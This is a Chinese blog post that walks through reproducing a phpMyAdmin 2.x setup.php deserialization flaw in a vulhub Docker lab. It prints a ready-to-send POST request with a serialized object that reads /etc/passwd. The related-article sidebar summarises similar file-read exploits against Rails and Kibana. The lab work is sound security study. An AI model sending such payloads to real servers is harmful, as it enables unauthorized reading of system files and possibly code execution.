phpmyadmin scriptssetup.php 反序列化漏洞(WooYun-2016-199433)

最新推荐文章于 2024-05-03 19:26:50 发布
最新推荐文章于 2024-05-03 19:26:50 发布
阅读量462 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: phpmyadmin 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824722
版权

声明

好好学习,天天向上

漏洞描述

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

影响范围

2.x

复现过程

这里使用2.8.0.4版本

使用vulhub

/app/vulhub-master/phpmyadmin/WooYun-2016-199433

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

抓包,修改发送如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: 192.168.239.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 340
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 371
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
最新发布
Grace_for_it的博客
05-03 508
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
Kibana本地文件包含漏洞(CVE-2018-17246)
大方子
07-23 5084
影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 搭建过程 cd vulhub-master/kibana/CVE-2018-17246 docker-compose up -d 验证POC http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../
[Vulhub](WooYun-2016-199433phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 818
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
其他类别phpMyAdmin 3.2.2.0 Final For Windows-phpmyadmin-3.2.2.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
phpMyAdmin-5.2.0-all-languages.zip
08-01
这个压缩包 "phpMyAdmin-5.2.0-all-languages.zip" 提供的是其5.2.0版本的全语言版本,包含了对多种语言的支持,使得全球用户都能方便地使用这一强大工具。 在5.2.0这个版本中,phpMyAdmin 带来了一些关键的改进和...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
[其他类别]phpMyAdmin 3.2.2.0 Final For Windows_phpmyadmin-3.2.2.zip
03-17
1. **图形化界面**:phpMyAdmin通过浏览器提供了一个易于使用的图形界面,用户可以通过点击和填写表单来执行复杂的数据库操作,而无需编写SQL语句。 2. **多语言支持**:phpMyAdmin支持多种语言,包括中文,使得...
phpmyadmin config.inc.php配置示例
10-26
个config.inc.php文件为phpmyadmin的配置信息,下面有个已配置好的例子,大家可以参考下
CVE-2019-5418:CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418:CVE-2019-5418-Ruby on Rails上的文件内容披露
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 792
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
第三方应用漏洞phpmyadmin scripts/setup.php 反序列化
qq_39756628的博客
04-26 657
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少。 影响版本:已知版本为 2.8.0.3、2.8.04 启动环境 cd /root/vulhub/phpmyadmin/WooYun-2016-199433 docker-compose up -d 环境启动后,直接在浏览器中访问http://192.168.0.107:8080,即可看到phpmyadmin的首页。因为没
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1728
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3694
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
php中%3cpre%3e有什么用,phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_34168834的博客
03-10 600
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit#!/bin/bash# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11# by pagvac (gnucitizen.org), 4th June 2009.# spec...
phpMyAdmin 2.x版本任意文件读取
网络安全。
01-18 850
0x01 简介 phpmyadmin scripts/setup.php 页面存在反序列化漏洞WooYun-2016-199433phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02 漏洞复现 POST /scripts/setup.php HTTP/1.1 Host: ip:8080 User-Agent: Mozilla/5...
记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
ancan8807的博客
07-28 399
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag in ffffllllaaaagggg 再回过头来观察source.php明显是一道代码审计的问题,其中存在4个限制条件 $_REQUEST['f...
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值